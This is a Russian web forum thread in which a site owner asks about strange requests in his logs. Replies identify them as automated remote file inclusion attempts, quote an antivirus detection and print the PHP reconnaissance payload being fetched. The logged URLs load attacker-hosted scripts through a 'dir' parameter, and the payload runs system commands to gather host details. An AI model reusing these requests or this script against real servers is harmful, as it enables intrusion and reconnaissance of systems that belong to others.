Меню
Что нового?

Странные запросы в логах (может хакер)

Maler

Новичок
Странные запросы в логах (может хакер)

Здравствуйте,
ежедневно наблюдаю странные запросы (с разных ip):
http://www.mysite.ru//skin/zero_vote/ask_password.php?dir=http://www.hakersite.de/12-cmd.txt?
http://www.mysite.ru//skin/zero_vote/ask_password.php?dir=http://www.hakersite.com/id.txt???
http://www.mysite.ru/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164&STRMVER=4&CAPREQ=0

Что это и какая цель?

П.С
Страниц скин, зеро, и т.д. на моем сайте нет.
Эти запросы ничего не возвращают, но все же интересно.
 

disc

Новичок
Это инъекции, какой код хотели выполнить можете глянуть в урлах, там txt файлы :)
 

Angerslave

Новичок
Видимо какой-то автобот ходит по сайтам, ищет какой-то дырявый скрипт чтобы потом поломать, похоже.
 

Maler

Новичок
очень похоже на бота, но какой смысл лезть каждый день по 1000 раз, если ничего не выходит.. :)
 

Alexander v2

Новичок
Это троян пытались запустить...
17.07.2008 8:37:05 Вредоносный HTTP-объект <http://www.abunaissa.de/12-cmd.txt?>: обнаружено: троянская программа 'Trojan.PHP.Zapchast.c'.
 

Maler

Новичок
:) ну, ладно, атака не прошла, всем спасибо.
ссылки в первом посте бью, чтобы случайно никто не зашел.
 
confguru

confguru

ExAdmin
Команда форума
Албанцкий вирус :) PHP.Zapchast.c
<?
echo "ALBANIA<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
exit;
?>
 
Войдите или зарегистрируйтесь для ответа.
Сверху